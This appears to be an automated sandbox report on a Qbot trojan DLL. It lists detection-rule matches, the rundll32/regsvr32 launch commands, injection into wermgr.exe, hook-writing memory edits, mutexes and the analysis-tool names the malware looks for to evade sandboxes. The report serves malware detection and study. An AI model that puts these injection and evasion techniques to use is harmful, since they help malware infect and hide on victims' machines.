Source: 8.0.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 8.0.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 5.2.rundll32.exe.4ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 5.2.rundll32.exe.4ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
Source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
Source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA604A0	0_2_6DA604A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA6CC86	0_2_6DA6CC86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA65CF6	0_2_6DA65CF6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA67909	0_2_6DA67909
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA648FC	0_2_6DA648FC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA5F07E	0_2_6DA5F07E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA5B200	0_2_6DA5B200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BD82A0	3_2_02BD82A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BD63B0	3_2_02BD63B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BD676F	3_2_02BD676F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BD35EE	3_2_02BD35EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BD29E9	3_2_02BD29E9

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6DA59CA0 appears 41 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6DA51730 appears 87 times

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BCD9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,		3_2_02BCD9DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BCD538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,		3_2_02BCD538

Source: diatomaceous.dat.dll.9.dr

Static PE information: No import functions for PE file found

Source: diatomaceous.dat.dll

Binary or memory string: OriginalFilenamegfngfhn sgedrl;fkweklnmgdfw8 vs diatomaceous.dat.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: diatomaceous.dat.dll.9.dr

Static PE information: Data appended to the last section found

Source: diatomaceous.dat.dll	ReversingLabs: Detection: 73%
Source: diatomaceous.dat.dll	Virustotal: Detection: 77%
Source: diatomaceous.dat.dll	Metadefender: Detection: 44%

Source: diatomaceous.dat.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior

Source: C:\Windows\SysWOW64\wermgr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Luinbgihotw

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winDLL@18/1@0/0

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02BCE485 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

3_2_02BCE485

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02BCBAF6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

3_2_02BCBAF6

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1

Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{802E0F5C-0297-4271-85B1-68FB37BCCA2D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1592:120:WilError_01
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{802E0F5C-0297-4271-85B1-68FB37BCCA2D}
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D22E6D0-571D-4DE7-AE01-CA297D9881B4}

Source: diatomaceous.dat.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: y'E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.330297730.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.330600299.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.330624876.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
Source:	Binary string: E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.330297730.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.330600299.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.330624876.000000006DA74000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
Source:	Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.331023524.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.331444985.0000000004401000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.330918332.00000000049C1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: rundll32.exe, 00000004.00000002.330081767.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317581182.00000000031D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317520093.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317597615.00000000031DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000004.00000002.330081767.000000000319A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317581182.00000000031D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317520093.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.317597615.00000000031DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.331023524.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.331444985.0000000004401000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.330918332.00000000049C1000.00000004.00000800.00020000.00000000.sdmp

Source: diatomaceous.dat.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: diatomaceous.dat.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: diatomaceous.dat.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: diatomaceous.dat.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: diatomaceous.dat.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA59B9F push ecx; ret	0_2_6DA59BB2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BDAEB6 push cs; iretd	3_2_02BDAE8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BDCB95 push esi; iretd	3_2_02BDCB9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BDB066 push ebx; ret	3_2_02BDB067
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BDADB4 push cs; iretd	3_2_02BDAE8A

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02BCEF38 LoadLibraryA,GetProcAddress,

3_2_02BCEF38

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll

Source: C:\Windows\SysWOW64\wermgr.exe

File created: C:\Users\user\Desktop\diatomaceous.dat.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 4648 base: 2C3C50 value: E9 42 26 26 02	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 4744 base: 2C3C50 value: E9 42 26 2C 02	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 3668 base: 2C3C50 value: E9 42 26 90 02	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXES"
Source: wermgr.exe, 00000009.00000003.332824884.0000000004C0F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.334728000.0000000004C16000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.334566045.0000000004C0F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.344140995.0000000004C0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXE7"
Source: wermgr.exe, 00000009.00000003.332824884.0000000004C0F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.334728000.0000000004C16000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.334566045.0000000004C0F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.344140995.0000000004C0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE;"
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SNIFF_HIT.EXE
